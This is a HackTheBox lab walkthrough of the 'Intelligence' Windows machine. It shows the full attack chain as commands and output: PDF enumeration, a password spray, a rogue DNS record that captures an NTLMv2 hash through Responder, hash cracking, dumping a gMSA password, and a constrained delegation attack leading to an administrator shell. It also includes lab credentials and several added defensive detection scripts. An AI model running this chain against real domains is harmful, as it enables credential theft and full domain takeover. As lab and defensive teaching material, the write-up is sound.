HTB - Intelligence

In this walkthrough, we will be going through the Intelligence room from HackTheBox. This room is rated as Medium on the platform and it consists of password spraying with credentials captured from internal PDF documents. For privilege escalation, the ability to read a group managed service account's password is abused to perform a constrained delegation attack, which gives access to the DC and root. So, let’s get started without any delay.

Intelligence

Machine Info:

Title: Intelligence
IP address: 10.10.10.248
Difficulty: Medium
OS: Windows
Description: Intelligence is a medium difficulty Windows machine in which we get an initial foothold on the target by leveraging credentials found in internal PDF documents. For privilege escalation, a scheduled PowerShell script is abused to get the hash of a second user. This user is allowed to read the password of a group managed service account, which in turn has constrained delegation access to the DC.

Enumeration:

  • I started off with a regular nmap scan with aggressive detection (-A) and found multiple open ports, as expected from a Windows machine. The key ports identified were – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389/636 (LDAP/LDAPS).

$ sudo nmap -A 10.10.10.248
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 23:00 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:54402 > 10.10.10.248:53 S ttl=50 id=14929 iplen=44  seq=1595588214 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:54403 > 10.10.10.248:53 S ttl=47 id=31369 iplen=44  seq=1595653751 win=1024 <mss 1460>
Nmap scan report for 10.10.10.248
Host is up (0.18s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-15 01:30:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-15T01:31:30
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   181.16 ms 10.10.14.1
2   182.50 ms 10.10.10.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.77 seconds

nmap scan

  • Also performed a full TCP port scan and found a bunch more ports. One that may be useful was 5985 (WinRM).

sudo nmap -sS -p- -T5 10.10.10.248

all TCP port scan

  • Added the host names to my /etc/hosts file.

adding hostname

  • Tried to enumerate some usernames using RPC and LDAP but found nothing.

RPC and LDAP user enum

  • Next, enumerated the web server running on port 80 and found a static website running.

Intelligence website

  • One thing that caught my attention was the PDF files in the Announcement Document section.

some Documents found

  • Found some sample text inside it. Nothing useful.

Random PDF document

  • Fired up gobuster against the server to reveal some juicy directories. Found only one hit, /documents, which we cannot access directly.

gobuster dir -u http://intelligence.htb/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

403 - Forbidden: Access denied

  • Going back to the PDF files, I looked at the URL carefully and it seems the PDF files are uploaded by date and named after that date as well. I changed part of the date and got a hit. That means we can fuzz the application for the available PDF files.

http://intelligence.htb/documents/2020-01-02-upload.pdf

2020-01-02-upload.pdf

Another PDF document

  • Generated a list of dates for the year 2020.

dates.txt

Fuzzing the application for PDF files

  • Next, used ffuf to fuzz the application for the PDF files and got a lot of hits.

$ ffuf -u http://intelligence.htb/documents/FUZZ-upload.pdf -w dates.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://intelligence.htb/documents/FUZZ-upload.pdf
 :: Wordlist         : FUZZ: /home/wh1terose/CTF/HTB/machines/Intelligence/dates.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

2020-01-22              [Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 907ms]
2020-01-02              [Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 179ms]

-- snipped --

2020-12-30              [Status: 200, Size: 25109, Words: 218, Lines: 191, Duration: 179ms]
:: Progress: [366/366] :: Job [1/1] :: 87 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

ffuf scan

ffuf result
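From the defender's side, the fuzzing above leaves a distinctive trace in the IIS logs: one client requesting dozens of date-named PDFs within seconds, most of them answered with 404. The Python script below is an added example, not part of the original walkthrough, that parses W3C-format IIS log lines and flags that pattern. The trimmed field set, the thresholds and the sample log lines (generated in build_sample_log) are assumptions constructed for the example.

```python
"""Detect date-pattern enumeration of /documents/ in IIS W3C logs.

Constructed example: the log lines come from build_sample_log(), not from the
target, and the field set is a trimmed W3C extended format.
"""
import re
from collections import defaultdict
from datetime import datetime

# Published file names follow YYYY-MM-DD-upload.pdf, the scheme seen on the site.
DATE_PDF = re.compile(r"^/documents/(\d{4}-\d{2}-\d{2})-upload\.pdf$", re.IGNORECASE)


def build_sample_log() -> str:
    """Constructed IIS log: one normal visitor and one client walking the calendar."""
    lines = ["#Fields: date time cs-method cs-uri-stem sc-status c-ip",
             "2023-12-14 17:40:01 GET /index.html 200 10.0.0.5",
             "2023-12-14 17:40:20 GET /documents/2020-01-02-upload.pdf 200 10.0.0.5",
             "2023-12-14 17:40:45 GET /documents/2020-01-22-upload.pdf 200 10.0.0.5"]
    published = {"2020-01-02", "2020-01-22"}          # only these two files exist
    for day in range(1, 32):                          # every day of January 2020, one request per second
        date = f"2020-01-{day:02d}"
        status = 200 if date in published else 404
        lines.append(f"2023-12-14 17:41:{day - 1:02d} GET /documents/{date}-upload.pdf {status} 10.0.0.99")
    return "\n".join(lines)


def parse_iis(log_text: str):
    """Yield one dict per request, using the #Fields: directive for column names."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_date_enumeration(log_text: str, window_seconds: int = 60,
                          min_distinct: int = 10, min_404_ratio: float = 0.5) -> dict:
    """Flag client IPs that request many distinct date-named PDFs in a short window,
    mostly receiving 404s (a legitimate reader only opens files that exist)."""
    per_ip = defaultdict(list)
    for rec in parse_iis(log_text):
        m = DATE_PDF.match(rec["cs-uri-stem"])
        if not m:
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        per_ip[rec["c-ip"]].append((ts, m.group(1), int(rec["sc-status"])))

    alerts = {}
    for ip, hits in per_ip.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):              # sliding time window over this client's requests
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1
            window = hits[start:end + 1]
            distinct = {date for _, date, _ in window}
            if len(distinct) < min_distinct:
                continue
            ratio = sum(1 for _, _, status in window if status == 404) / len(window)
            if ratio >= min_404_ratio:
                alerts[ip] = {"distinct_dates": len(distinct), "requests": len(window),
                              "not_found_ratio": round(ratio, 2)}
                break                              # one alert per client is enough
    return alerts


if __name__ == "__main__":
    for ip, info in find_date_enumeration(build_sample_log()).items():
        print(f"{ip}: {info}")
```

The 404 ratio is what separates enumeration from a reader who follows links: a visitor only opens files that exist, so a client collecting mostly 404s on a predictable name pattern is guessing names. Real IIS logs carry more columns than the constructed sample; the parser reads the column order from the #Fields: line, so extra columns do not break it.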

  • Found a message regarding an Internal IT Update, which talks about a script developed by user Ted to notify the teams about any outages or attacks.

http://intelligence.htb/documents/2020-12-30-upload.pdf

Internal IT Update pdf

  • Meanwhile, I also tried to enumerate some shares using smbclient but found nothing.

SMB Enumeration

  • I downloaded the file containing the note to my local machine.

wget http://intelligence.htb/documents/2020-12-30-upload.pdf

downloading PDF

  • Looked inside its metadata and found the Creator name – Jason.Patterson.

exiftool 2020-12-30-upload.pdf

Looking at its metadata

  • I generated the date list again, this time covering 2020 and 2021, and got many successful hits. Next, we have to download them in order to get at least some potential usernames.

ffuf scan

  • Used the commands below to build the download URLs from the ffuf results.

cut -d " " -f 1 files.txt > final.txt
head final.txt

final dates

sed -e 's/$/-upload.pdf/' -i final.txt 

adding upload.pdf

awk '$0="http://intelligence.htb/documents/"$0' final.txt > pdflist.txt

creating URL for download

  • Downloaded all the PDF files to my local machine using wget.

wget -i pdflist.txt 

Downloading all PDF files

  • Found a default Account password in one of the PDF files – NewIntelligenceCorpUser9876.

Found password

  • Next, I used Metaforge to extract all the metadata from the PDF files and save it in one location.

python3 ~/Tools/Metaforge/metaforge.py

Using Metaforge

Scan Finished

Viewing the report

  • Used the Linux-fu below to pull the usernames out of all the captured metadata.

grep Creator *-upload.pdf.json | cut -d ":" -f 4 | tr "," " " | tr -d '"' > usernames.txt

usernames.txt
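The username list came entirely from the Creator field, so the durable fix sits on the publishing side: check a document's metadata before it goes onto the web server. The Python below is an added example, not the author's or Metaforge's code. It is a small parser for the string values of a PDF's Info dictionary (literal and hex strings, with escapes and UTF-16 handled) that flags Author/Creator values shaped like First.Last account names. The minimal PDF bytes are constructed for the example and the First.Last pattern is an assumption about the naming scheme.

```python
"""Pre-publication check for identifying metadata in PDF documents.

Added example: a small parser for the string values of the PDF Info dictionary
that flags Author/Creator values shaped like domain usernames. SAMPLE_PDF is a
constructed minimal file, not a document from the target.
"""
import re

INFO_KEYS = ("Title", "Author", "Creator", "Producer", "Subject")
# First.Last is the sAMAccountName shape the spray list was built from (assumption).
USERNAME_LIKE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")

# Constructed minimal PDF with an Info dictionary in object 3.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Title (Internal IT Update \\(Q4\\)) /Author (Jason.Patterson)\n"
    b"   /Creator (Microsoft\\256 Word) /Producer <FEFF0057006F00720064> >> endobj\n"
    b"trailer << /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
)

# A PDF string is either a literal (...) with backslash escapes or a hex <...> string.
_VALUE = rb"(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)"


def _decode_literal(body: bytes) -> bytes:
    """Undo literal-string escapes: backslash-n/r/t, escaped parens and backslash, octal ddd."""
    out, i = bytearray(), 0
    simple = {ord("n"): 10, ord("r"): 13, ord("t"): 9}
    while i < len(body):
        if body[i] == 0x5C and i + 1 < len(body):          # backslash escape
            j, digits = i + 1, b""
            while j < len(body) and len(digits) < 3 and 0x30 <= body[j] <= 0x37:
                digits += body[j:j + 1]
                j += 1
            if digits:                                      # octal escape \ddd
                out.append(int(digits, 8) & 0xFF)
                i = j
            else:                                           # \n \r \t or an escaped literal char
                out.append(simple.get(body[i + 1], body[i + 1]))
                i += 2
        else:
            out.append(body[i])
            i += 1
    return bytes(out)


def _to_text(raw: bytes) -> str:
    """UTF-16BE when the BOM is present, otherwise single-byte text (Latin-1 approximates PDFDocEncoding)."""
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be")
    return raw.decode("latin-1")


def extract_info(pdf_bytes: bytes) -> dict:
    """Return the string-valued Info entries found in the file (first match per key)."""
    info = {}
    for key in INFO_KEYS:
        m = re.search(rb"/" + key.encode() + rb"\s*" + _VALUE, pdf_bytes, re.DOTALL)
        if not m:
            continue
        token = m.group(1)
        if token.startswith(b"("):
            raw = _decode_literal(token[1:-1])
        else:
            raw = bytes.fromhex(token[1:-1].decode())
        info[key] = _to_text(raw)
    return info


def leaked_usernames(pdf_bytes: bytes) -> list:
    """Values that look like a First.Last account name and should be removed before publishing."""
    return sorted({v for v in extract_info(pdf_bytes).values() if USERNAME_LIKE.match(v)})


if __name__ == "__main__":
    print(extract_info(SAMPLE_PDF))
    print("blocks publication:", leaked_usernames(SAMPLE_PDF))
```

The script only reports; a file that fails the check has to be rewritten without the offending entries (for example with exiftool -all= or a PDF library), because patching the bytes in place would break the cross-reference offsets. The regex scan over the raw file is deliberately simple and does not follow object streams or incremental updates, which is fine for a publishing gate but not a substitute for a full PDF parser.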

  • Performed a password spray with the default password against the username list we generated. Got a hit for – Tiffany.Molina.

$ crackmapexec smb 10.10.10.248 -u usernames.txt -p 'NewIntelligenceCorpUser9876'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] STATUS_LOGON_FAILURE 

-- snipped -- 

SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 

crackmapexec password spray

Successful hit for Tiffany user
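A spray like the one above is loud on the domain controller: one source address producing failed logons for many different accounts within seconds, followed by a success for the single account that still had the default password. The Python below is an added example, not from the original walkthrough, that runs that detection over constructed event records shaped like the fields of Security events 4625 (failed logon) and 4624 (successful logon). The event dicts, the thresholds, the source addresses and the account names beyond those on the page are assumptions; a DC validating NTLM also records 4776, which can be mapped to the same fields.

```python
"""Password-spray detection over Windows logon events.

Added example: the events are constructed dicts shaped like the fields of
Security event 4625 (failed logon) and 4624 (successful logon); they are not
logs from the target.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_events() -> list:
    """Constructed events: one client fails against many accounts, then succeeds for one."""
    t0 = datetime(2023, 12, 14, 17, 50, 0)
    # Accounts from the page plus constructed filler names in the same First.Last shape.
    sprayed = ["William.Lee", "Jason.Patterson", "Ted.Graves", "Tiffany.Molina",
               "Anna.Sample", "Bob.Sample", "Carol.Sample", "Dan.Sample"]
    events = []
    for i, user in enumerate(sprayed):
        events.append({"EventID": 4625, "TimeCreated": t0 + timedelta(seconds=i),
                       "TargetUserName": user, "IpAddress": "10.10.14.24",
                       "Status": "0xC000006D"})                 # bad user name or password
    events.append({"EventID": 4624, "TimeCreated": t0 + timedelta(seconds=len(sprayed)),
                   "TargetUserName": "Tiffany.Molina", "IpAddress": "10.10.14.24",
                   "LogonType": 3})                             # network logon (SMB)
    # A user mistyping their own password once is not a spray.
    events.append({"EventID": 4625, "TimeCreated": t0 + timedelta(minutes=1),
                   "TargetUserName": "Ted.Graves", "IpAddress": "10.0.0.7",
                   "Status": "0xC000006A"})
    events.append({"EventID": 4624, "TimeCreated": t0 + timedelta(minutes=1, seconds=20),
                   "TargetUserName": "Ted.Graves", "IpAddress": "10.0.0.7", "LogonType": 2})
    return events


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=5) -> dict:
    """Flag source IPs whose failed logons cover >= min_accounts distinct accounts inside one
    window, and list the accounts that then logged on successfully from the same source."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] in (4624, 4625):
            by_ip[e["IpAddress"]].append(e)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        failures = [e for e in evs if e["EventID"] == 4625]
        start = 0
        for end in range(len(failures)):          # sliding window over this source's failures
            while failures[end]["TimeCreated"] - failures[start]["TimeCreated"] > window:
                start += 1
            accounts = {e["TargetUserName"].lower() for e in failures[start:end + 1]}
            if len(accounts) >= min_accounts:
                since = failures[start]["TimeCreated"]
                successes = sorted({e["TargetUserName"] for e in evs
                                    if e["EventID"] == 4624 and e["TimeCreated"] >= since})
                findings[ip] = {
                    "accounts_tried": len({e["TargetUserName"].lower() for e in failures}),
                    "first_failure": since.isoformat(),
                    "successful_logons": successes,   # the accounts that need a password reset
                }
                break
    return findings


if __name__ == "__main__":
    for ip, finding in detect_password_spray(build_sample_events()).items():
        print(ip, finding)
```

Keying on distinct accounts per source rather than failures per account is what makes this catch a spray: one attempt per account never trips a lockout threshold, but the breadth from a single address is abnormal. The successful_logons list is the remediation queue, since those are the accounts whose default password was confirmed.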

  • Tried to get shell access with user Tiffany.Molina over WinRM but was denied.

No shell via Winrm

Initial Access:

  • Next, checked the SMB share permissions for the user and found an interesting share – Users.

smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876

Using Tiffany creds with SMB

downdetector.ps1 found

  • Got access to the Users share and captured the user flag.

$ smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Mon Apr 19 06:50:26 2021
  ..                                 DR        0  Mon Apr 19 06:50:26 2021
  Administrator                       D        0  Mon Apr 19 05:48:39 2021
  All Users                       DHSrn        0  Sat Sep 15 12:51:46 2018
  Default                           DHR        0  Mon Apr 19 07:47:40 2021
  Default User                    DHSrn        0  Sat Sep 15 12:51:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 12:41:27 2018
  Public                             DR        0  Mon Apr 19 05:48:39 2021
  Ted.Graves                          D        0  Mon Apr 19 06:50:26 2021
  Tiffany.Molina                      D        0  Mon Apr 19 06:21:46 2021

		3770367 blocks of size 4096. 1405400 blocks available
smb: \> cd Tiffany.Molina\
smb: \Tiffany.Molina\> ls
  .                                   D        0  Mon Apr 19 06:21:46 2021
  ..                                  D        0  Mon Apr 19 06:21:46 2021
  AppData                            DH        0  Mon Apr 19 06:21:46 2021
  Application Data                DHSrn        0  Mon Apr 19 06:21:46 2021
  Cookies                         DHSrn        0  Mon Apr 19 06:21:46 2021
  Desktop                            DR        0  Mon Apr 19 06:21:46 2021
  Documents                          DR        0  Mon Apr 19 06:21:46 2021
  Downloads                          DR        0  Sat Sep 15 12:42:33 2018
  Favorites                          DR        0  Sat Sep 15 12:42:33 2018
  Links                              DR        0  Sat Sep 15 12:42:33 2018
  Local Settings                  DHSrn        0  Mon Apr 19 06:21:46 2021
  Music                              DR        0  Sat Sep 15 12:42:33 2018
  My Documents                    DHSrn        0  Mon Apr 19 06:21:46 2021
  NetHood                         DHSrn        0  Mon Apr 19 06:21:46 2021
  NTUSER.DAT                        AHn   131072  Thu Dec 14 15:19:09 2023
  ntuser.dat.LOG1                   AHS    86016  Mon Apr 19 06:21:46 2021
  ntuser.dat.LOG2                   AHS        0  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf    AHS    65536  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Apr 19 06:21:46 2021
  ntuser.ini                        AHS       20  Mon Apr 19 06:21:46 2021
  Pictures                           DR        0  Sat Sep 15 12:42:33 2018
  Recent                          DHSrn        0  Mon Apr 19 06:21:46 2021
  Saved Games                         D        0  Sat Sep 15 12:42:33 2018
  SendTo                          DHSrn        0  Mon Apr 19 06:21:46 2021
  Start Menu                      DHSrn        0  Mon Apr 19 06:21:46 2021
  Templates                       DHSrn        0  Mon Apr 19 06:21:46 2021
  Videos                             DR        0  Sat Sep 15 12:42:33 2018

		3770367 blocks of size 4096. 1405400 blocks available
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
  .                                  DR        0  Mon Apr 19 06:21:46 2021
  ..                                 DR        0  Mon Apr 19 06:21:46 2021
  user.txt                           AR       34  Thu Dec 14 15:09:41 2023

		3770367 blocks of size 4096. 1405400 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> exit

Accessing the SMB share - Users

user.txt found

user flag

  • Another interesting share that held yet another interesting file was – IT. Got access to it and downloaded the PowerShell script named downdetector.ps1.

smbclient //10.10.10.248/IT --user Tiffany.Molina --password NewIntelligenceCorpUser9876

get downdetector.ps1 

downloading downdetector.ps1

  • Looked inside the downdetector script and found that it is the script user Ted set up, as described in the note. The script looks for DNS records starting with “web” and, using Ted's credentials via -UseDefaultCredentials, sends an email to Ted notifying him of a potential attack.

cat downdetector.ps1

Lateral Movement:

  • We can take advantage of this and capture user Ted’s NTLM hash via Responder. For that, we have to set up a fake DNS record starting with the string “web” that resolves to our Responder listener IP. Once the script checks the newly configured DNS record, it will send an alert using Ted’s creds, and at that moment we will be able to capture the hash. I used dnstool to add the DNS record.

python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record webfake --data 10.10.14.17 10.10.10.248

dnstool.py

  • Set up Responder for the attack. Within 5 minutes, I was blessed with the NTLMv2 hash of user Ted.Graves.

sudo responder -I tun0 -v

Setting up Responder

Captured Ted.Graves hash

Ted.Graves::intelligence:b1cfe264a50ed5c7:B2C10F808E9EFC93C238CDBAF1D3DE85:0101000000000000CC594EFAB82FDA018303CE6123B8DDDB0000000002000800570036004F00510001001E00570049004E002D00420050005400470043004A004D00340030004400590004001400570036004F0051002E004C004F00430041004C0003003400570049004E002D00420050005400470043004A004D0034003000440059002E00570036004F0051002E004C004F00430041004C0005001400570036004F0051002E004C004F00430041004C0008003000300000000000000000000000002000002003AAB437CFF3C3635772FB56BADB1F7B83CA2EB3A9528EB46F5F34FDBA37650A0010000000000000000000000000000000000009003A0048005400540050002F00770065006200660061006B0065002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

  • Cracked the hash using hashcat and got the password.

sudo hashcat -m 5600 hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -O

Ted.Graves hash cracked

  • Next, I used bloodhound-python with the recovered credentials to collect information from the domain.

$ bloodhound-python -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -gc intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to GC LDAP server: intelligence.htb
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 53S

Bloodhound enumeration

  • Uploaded the data to BloodHound and looked for the “Shortest Path to Domain Admins”. The path shows that once we control SVC_INT we are allowed to delegate to the DC, and we can reach SVC_INT from our currently owned user through the ITSUPPORT group, which has ReadGMSAPassword rights over it.

Shortest Path to Domain Admins

Can ReadGMSAPassword

  • I looked at the help for this edge and learned that it can be abused using the gMSADumper tool.

ReadGMSAPassword abuse

  • I used it and dumped the hash for the svc_int gMSA account.

python3 ~/Tools/gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

using gMSADumper to dump the hash

Privilege Escalation:

  • Next, I performed a constrained delegation attack from svc_int against the DC, impersonating Administrator to obtain a service ticket for it. I first synced my clock with the DC, since Kerberos rejects requests when the clock skew exceeds five minutes (nmap reported a skew of +8h and bloodhound-python had already fallen back to NTLM because of it).

AllowedToDelegate privilege

AllowedToDelegate abuse

sudo ntpdate 10.10.10.248

getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :d4a0554f26a9f3df13720481e07e0a3f -impersonate administrator intelligence.htb/svc_int

export KRB5CCNAME=administrator.ccache

creating a TGT as admin
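The two edges BloodHound chained here, ReadGMSAPassword on the gMSA and AllowedToDelegate from the gMSA to the DC, can be audited from a directory export without BloodHound. The Python below is an added example, not the page's or BloodHound's code: it builds that graph from a constructed snapshot modelled on the page's findings and reports which users have a path to a domain controller, plus who can read each gMSA's password once group membership is expanded. The snapshot, the svc_int$ naming and the mapping to LDAP attributes given in the comments are assumptions.

```python
"""Audit the ReadGMSAPassword -> AllowedToDelegate chain from a directory snapshot.

Added example. DIRECTORY is a constructed dict modelled on the relationships the
page describes, not real LDAP output. In production the same data comes from
LDAP: group membership (memberOf), msDS-GroupMSAMembership on the gMSA (who may
retrieve its password) and msDS-AllowedToDelegateTo (SPNs it may delegate to).
"""
from collections import defaultdict, deque

DIRECTORY = {
    "users": {"Ted.Graves": ["ITSUPPORT"], "Tiffany.Molina": [], "William.Lee": ["HELPDESK"]},
    "groups": {"ITSUPPORT": [], "HELPDESK": []},           # group -> parent groups (nesting)
    "gmsa": {"svc_int$": {"can_read_password": ["ITSUPPORT"],
                          "allowed_to_delegate_to": ["WWW/dc.intelligence.htb"]}},
    "computers": {"dc.intelligence.htb": {"spns": ["WWW/dc.intelligence.htb"], "is_dc": True}},
}


def build_edges(directory: dict) -> dict:
    """Turn the snapshot into a directed graph of the three relationship types."""
    edges = defaultdict(list)
    for user, groups in directory["users"].items():
        for group in groups:
            edges[user].append(("MemberOf", group))
    for group, parents in directory["groups"].items():
        for parent in parents:
            edges[group].append(("MemberOf", parent))
    # Map each registered SPN back to the computer that owns it.
    spn_owner = {spn.lower(): host
                 for host, info in directory["computers"].items() for spn in info["spns"]}
    for account, info in directory["gmsa"].items():
        for principal in info["can_read_password"]:
            edges[principal].append(("ReadGMSAPassword", account))
        for spn in info["allowed_to_delegate_to"]:
            if spn.lower() in spn_owner:
                edges[account].append(("AllowedToDelegate", spn_owner[spn.lower()]))
    return edges


def shortest_path(edges: dict, start: str, goal: str):
    """Breadth-first search; returns [node, edge, node, ...] or None when unreachable."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = [node]
            while prev[node] is not None:
                parent, label = prev[node]
                path = [parent, label] + path
                node = parent
            return path
        for label, nxt in edges.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, label)
                queue.append(nxt)
    return None


def paths_to_domain_controllers(directory: dict) -> dict:
    """For every user, the shortest chain ending at a domain controller, if one exists."""
    edges = build_edges(directory)
    dcs = [host for host, info in directory["computers"].items() if info["is_dc"]]
    found = {}
    for user in directory["users"]:
        for dc in dcs:
            path = shortest_path(edges, user, dc)
            if path:
                found[user] = path
                break
    return found


def gmsa_readers(directory: dict) -> dict:
    """Expand group membership: which users can ultimately read each gMSA's password."""
    edges = build_edges(directory)
    return {account: sorted(u for u in directory["users"] if shortest_path(edges, u, account))
            for account in directory["gmsa"]}


if __name__ == "__main__":
    for user, path in paths_to_domain_controllers(DIRECTORY).items():
        print(user, "->", " -> ".join(path))
    print(gmsa_readers(DIRECTORY))
```

Each hop in the reported path is a configuration a defender owns: the ITSUPPORT membership, the principals allowed to retrieve the gMSA password, and the delegation target list on the service account. Breaking any one of them (most cheaply, removing the DC's SPN from the gMSA's delegation list, or narrowing who may read its password) removes the path, and re-running the audit after the change confirms it.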

  • Used the requested ticket to get shell access on the target with psexec.py as Administrator.

psexec.py -k -no-pass dc.intelligence.htb

Getting root

  • Finally captured the root flag and completed the room.

root flag

machine completed

Conclusion:

